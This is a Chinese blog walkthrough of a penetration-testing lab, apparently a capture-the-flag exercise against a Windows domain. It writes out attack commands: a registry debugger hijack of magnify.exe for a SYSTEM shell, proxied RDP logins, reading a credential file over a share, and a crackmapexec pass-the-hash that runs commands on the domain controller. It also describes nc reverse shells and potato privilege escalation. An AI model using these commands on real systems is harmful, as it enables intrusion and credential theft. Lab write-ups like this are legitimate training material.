type
Post
status
Published
date
Apr 27, 2026
slug
summary
tags
category
category (1)
icon
password
comment
先用fscan进行扫描得到如下信息
然后用vscode的插件SQL SERVER进行连接
用户名:sa
密码:1qaz!QAZ
接下来开启shell配置
得到如下结果
接下来查看我们的权限
发现只是普通用户,去查看安装了哪些补丁,看看补丁的漏洞
查看是否有提权权限
如果在结果中看到
SeImpersonatePrivilege 显示为 Enabled,那么几乎可以 100% 提权到 SYSTEM。利用“土豆(Potato)”系列工具需要将 exe 工具传到服务器
首先将工具GodPotato-NET4.exe传到公网服务器上,然后然后用
python -m http.server 启动一个在8000端口的服务,之后执行如下命令在靶机上将文件下载到指定的位置同理下载nc工具,先用nc进行shell反弹
进行flag查找
这边必须要加
cmd.exe /c ,不然会出现如下报错
这是因为单独的dir命令不是exe文件,要以exe文件执行
扫描之后得到flag目录
进行flag读取
flag{1822237e-0f94-42be-8d7c-b3084d99569c}
用管理员权限查看在线用户
query user 
用管理员权限查看session
query session
发现john用户有连接,执行
netstat -an 
需要模拟 John 用户的令牌, 并访问
\\tsclient共享 (172.22.8.31)先用gp.exe执行bacon.exe连接cs,这样可以直接获得管理员权限的cs终端
接下来去进程注入
得到了john用户的shell
查看john的共享文件
去读共享文件
shell type \\tsclient\c\credential.txt
得到了账号密码以及提示
先使用shisel连接
进行密码喷洒
显示密码过期,那就先去更改密码
应该只有
172.22.8.15 能改密码,因为这台是主控域服务器
这边我用mac的
xfreerdp 进行登陆的(相关配置我拷打cc,它给我配好的)proxychains4 xfreerdp /v:172.22.8.46 /u:Aldrich /d:xiaorang.lab /p:'Qext123456@' /cert:ignore提权命令
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe”
接下来锁定去点放大镜调出管理员的shel
对现在用户的权限进行验证可以发现是管理员权限
读取flag
接着在46靶机上上传cs马,连接
查看域管理员
net group "domain admins" /domain
抓取密码
logonpasswords直接打DC
proxychains4 crackmapexec smb 172.22.8.15 -u WIN2016$ -H 374e0bdc02e3dbac0bb75c921560a337 -d xiaorang -x "type C:\Users\Administrator\flag\flag03.txt"
得到flag
- 作者:qetx
- 链接:http://qetx.top/article/34fb233d-8731-8099-acf0-d48e9b85eefb
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。
